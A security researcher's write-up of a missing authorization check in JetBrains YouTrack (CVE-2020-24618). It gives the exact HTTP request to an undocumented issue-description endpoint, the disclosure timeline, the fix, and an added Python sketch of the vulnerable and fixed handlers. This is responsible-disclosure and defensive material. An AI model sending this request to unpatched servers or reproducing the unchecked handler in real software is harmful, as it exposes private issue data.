How I found a primitive but critical broken access control vulnerability in YouTrack (CVE-2020-24618)

Yurii Sanin
MitmLab
Aug 24, 2021

Here is a story about how I found a primitive but critical vulnerability in JetBrains YouTrack.

Description

Details: CVE-2020-24618, Exploit

I was inspecting YouTrack internals and found one REST API endpoint that was not mentioned in the official documentation. The endpoint returned an issue description/details without Markdown markup. I did a few Authn/Authz tests, which exposed that role validation was missing, so an unprivileged user could retrieve any issue details.

Request:

GET /rest/issue/JT-12345/descriptionWithRemovedMarkup HTTP/1.1
Host: youtrack.jetbrains.com
User-Agent: {UserAgent}
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 Aug 2020 12:59:50 GMT
Content-Type: application/xml;charset=UTF-8
Content-Length: 2784
Connection: close
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Location
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: YTSESSIONID=node01qnahqilj5weh3tfrk4z0d1v9075794.node0; Path=/; Secure; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, no-transform, must-revalidate
Strict-Transport-Security: max-age=31536000;

%ISSUE DETAILS%

I did a PoC and reported this issue to the YouTrack team almost immediately.
The report contained a simple HTTP GET request which exposed a description of another unpatched security issue I’ve reported before.

PoC: description of another security issue

They took this vulnerability extremely seriously — assigned “show-stopper” priority and fixed it in less than an hour.

Impact

This vulnerability could allow an attacker to obtain all the issue descriptions in the application. Things get worse when the guest account is enabled: an attacker could get all this information even without authorization. Due to the nature of the application, the issues could contain sensitive information such as credentials, information intended for internal use, or descriptions of unpatched security issues. Fortunately, issue comments and attached files weren’t exposed or affected in any way.

Timeline

13 Aug 2020 16:07 : reported through the bug tracking system
13 Aug 2020 16:31 : vendor confirmed the vulnerability and assigned a priority.
13 Aug 2020 16:51 : state changed to “in-progress”.
13 Aug 2020 17:03 : patch released by the vendor.
16 Nov 2020 11:15 : public release of advisory.

After a few months, JetBrains released a security bulletin, and there was only one critical-severity issue (guess which one). Moreover, it was the second critical finding across all the reported vulnerabilities in JetBrains products for the entire year 2020.

JetBrains Security Bulletin Q3 2020

The funny thing is that the issue was estimated as medium severity by its CVSS 3.1 score. The reason is that the “Privileges Required” metric is LOW (PR:L), which is, in fact, generally correct but not always the case (you can exploit it without authentication when the guest user account is enabled).

Mitigation:

The JetBrains team added checks for the issue READ permission, which is approximately one line of code. In later versions of YouTrack, they deprecated this functionality and then removed it altogether.

{
  "error": "Deprecated REST API is disabled",
  "error_description": "https://blog.jetbrains.com/youtrack/2021/02/discontinuing-the-legacy-rest-api-action-required"
}
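The missing READ check and its fix, as an added Python sketch that is not YouTrack's code or the author's: it shows the handler before and after the check, plus a regression sweep that calls every registered route as a low-privileged user, so an undocumented endpoint cannot slip past review. Every name except the route path is hypothetical, and the issues and grants are constructed sample data.

```python
# Added illustration, not YouTrack code: every name except the route path is hypothetical.
from dataclasses import dataclass

ROUTE = "/rest/issue/{id}/descriptionWithRemovedMarkup"  # path taken from the post

@dataclass(frozen=True)
class Issue:
    issue_id: str
    project: str
    description: str

# Constructed sample data: one restricted project (SEC), one guest-readable (PUB).
ISSUES = {i.issue_id: i for i in (
    Issue("SEC-1", "SEC", "**unpatched** bug details"),
    Issue("PUB-1", "PUB", "public *feature* request"),
)}
READ_GRANTS = {"guest": {"PUB"}, "secteam": {"PUB", "SEC"}}

class Forbidden(Exception):
    """Maps to an HTTP 403 in a real service."""

def can_read(user, issue):
    return issue.project in READ_GRANTS.get(user, set())

def strip_markup(text):
    return text.replace("*", "")  # stand-in for real Markdown stripping

def handler_before(user, issue_id):
    # Loads the object by ID and returns it; the caller's role is never consulted.
    return strip_markup(ISSUES[issue_id].description)

def handler_after(user, issue_id):
    issue = ISSUES[issue_id]
    if not can_read(user, issue):  # the roughly one-line READ check
        raise Forbidden(issue_id)
    return strip_markup(issue.description)

def audit(routes, user):
    """Call every registered route as `user` for each issue they cannot read;
    return the (route, issue_id) pairs that answered instead of refusing."""
    leaks = []
    for route, handler in routes.items():
        for issue in ISSUES.values():
            if can_read(user, issue):
                continue
            try:
                handler(user, issue.issue_id)
                leaks.append((route, issue.issue_id))
            except Forbidden:
                pass
    return leaks
```

Driving `audit` from the application's live route table rather than from the documented API list is what makes it cover endpoints like this one.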

That’s it. I hope you liked this. Any questions? DM @saninyurii
